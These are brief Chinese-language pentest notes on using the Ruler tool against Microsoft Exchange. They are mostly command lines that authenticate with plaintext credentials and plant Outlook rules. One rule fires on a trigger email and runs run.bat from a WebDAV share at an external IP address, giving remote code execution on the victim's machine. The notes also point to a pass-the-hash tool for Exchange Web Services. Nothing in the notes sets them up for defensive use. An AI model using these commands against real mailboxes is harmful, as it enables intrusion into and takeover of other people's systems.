Exploitation tool:
https://github.com/sensepost/ruler

Notes on the tool's commands:

ruler-win64.exe -k --email micle@rootkit.org --username micle --password Admin12345 display

ruler-win64.exe -k --email micle@rootkit.org --username micle --password Admin12345 add --location "calc.exe" --trigger "systest" -name test
ruler-win64.exe -k --email micle@rootkit.org --username micle --password Admin12345 add --location "\\\\173.248.241.176\\webdav\\run.bat" --trigger "linux" -name linux

ruler-win64.exe -k --email micle@rootkit.org --username micle --password Admin12345 send --subject "hello linux" --body "ssssss"

ruler-win64.exe -k --email micle@rootkit.org --username micle --password Admin12345 delete --id 0100000005a104b6

ruler-win64.exe -k --email test@pentest.org --username test --password "123456aA!" display

Related articles:
https://paper.seebug.org/775/
https://silentbreaksecurity.com/malicious-outlook-rules/
WebDAV setup

How to log in to and operate Exchange when only the NTLM hash is available:
https://github.com/pentest-tools-public/Pass-to-hash-EWS